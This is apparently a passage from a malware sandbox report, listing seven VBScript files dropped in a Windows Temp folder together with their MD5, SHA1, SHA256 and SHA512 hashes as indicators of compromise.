| SHA256 | 03f1d446995f790aa4a55848c1161d28eb9526e6330c72d2058acc059a56137d |
| SHA512 | 751a09d4db1c6603cdecb025872f89d9697cd3dc541eb839926ebdcc7ebdbd37eadbb06e56aace9df6898538d67b2b0a47ee7d0a56c916aaa30ee485c2d918fb |
C:\Users\Admin\AppData\Local\Temp\79d8d831-89f9-4762-b1a4-f88f984104fa.vbs
| MD5 | fba285925e3d4a6934e8855c5a7f607b |
| SHA1 | 264d77d7cfe521b3ddb6320df5d9b7ac698cf82d |
| SHA256 | 0d0075c3672b522ada6ed8816b6c95fd462a9f8cd40bf46967bee68dd19b9acd |
| SHA512 | 408d57c114d490bc3a2f1f359af3a2b91a58f5da606157b7802b792c154b42d93c02a3e325ed105843b2034142ecb60fe0b2bc6a43d3d8b96028e0fac7e8edf2 |
C:\Users\Admin\AppData\Local\Temp\4bcc22c2-bfc5-4da7-b57a-f1d64750d21c.vbs
| MD5 | 5e753b39185bd2b6718b3ba7b82aa474 |
| SHA1 | a2a90bde15a46f2c451c51e9b2ba9de4faeb8144 |
| SHA256 | c769601789b806bf9c264920524f6b7ed27dd1d6eb01bf0020df10e9571c2748 |
| SHA512 | 1c9b1147baeeae61b42ea6dd72590e78ae23d1e80e96f1df35fe51c24c2d21278bc8d0ec7e204c84a39776e13eaa2e22f66f787f45ec66d3323e51f2e9d6c9d5 |
C:\Users\Admin\AppData\Local\Temp\2e3b6573-9956-4c08-a354-650a54e4b5fc.vbs
| MD5 | 133b0b141005878ef497aab0ed89d9e4 |
| SHA1 | c8313f29635593e1c11a68d89b97fb1f0a5c446b |
| SHA256 | 9351880bda96633971197caa9ec767802845d26e3dc5da268ab69299262519b3 |
| SHA512 | 5a6868e827989cd48db3a2c9545baa3c1f1fd4fd2023529d69f08a13b0facf0c4c7b6e6621ed6be89909fa9a7473be5786e2c1e7caf3f7d656c6445821892963 |
C:\Users\Admin\AppData\Local\Temp\d5a02c96-5b4d-4eac-be2a-3b9ea31321b6.vbs
| MD5 | 670ca1952cf4cc3076532b671c86b6c0 |
| SHA1 | bcb4298927bf213a1e7d3496da7c1fc719541e14 |
| SHA256 | 8fc1809d6c04c9922db24d125c43d67f939f44b202051dd72103c87afd252a03 |
| SHA512 | 24331c612d4aafcf61074b77078cdb9e67ffbd0c4614d4965b6678ed97957d16d14f563404f3e6ab102e23dc6208eff5a798008d8858019246e567789759c806 |
C:\Users\Admin\AppData\Local\Temp\77723675-b9f0-49d6-86aa-6fd4188fef6f.vbs
| MD5 | 1ee3ad79e53f9daf6cb84a9fbe7b14ec |
| SHA1 | 8315aea769144989b55d61d7bfc8267eefd5f47f |
| SHA256 | 7587b5c9b7e1476869d96641a5f5d5364938d202cd2c364a58cfce5a3a5a4bfb |
| SHA512 | 4d7177fb926f140461f0fe6858cdd8b0c0936d957c67961df53e6cd0b13753b6a7e7e2865589172a17ffced01b362be4e225fdabb2e1acceaa3c3d92fb275eac |
C:\Users\Admin\AppData\Local\Temp\58cd3153-e99f-4382-8f9d-20b7b99c045d.vbs
| MD5 | fee8ac1bc4a472ec1285bf070266d40d |
| SHA1 | f12a85efe00a4a40a4d5a0b88df142c9e9387d35 |
| SHA256 | 49231d4f5941440bb49df789d982dd3fc87f4fa8397a4cd8183285f0a27e67eb |
| SHA512 | 4f37e77031939a900408a3ea4f25b975c5e67e3ca71ab825b764a497c263fffca5fb0284365a163476ba245d08ca7a1b8278a04f1a62bfadfea2d50da69dbfc3 |
C:\Users\Admin\AppData\Local\Temp\a20377c5-42e8-47d2-8941-150cbd2a1243.vbs
| MD5 | 94ae98a099f9e20d7e8514bf87603751 |
| SHA1 | dfac2e0cf4d915abdac2f149b7be3172d15ddff8 |
| SHA256 | 8dd75515a9b4690a3eb907418696de48c2c42750cf530fa78f99d6151dfec7ca |
| SHA512 | 7a8c4debeef65e95f3264204e04d976e34ffdf9ef7c530c2583e16dfa04ebc1d045be923111e9402a5ab7d833ed54040ccdcd07a768da7794ef963e09b58d32e |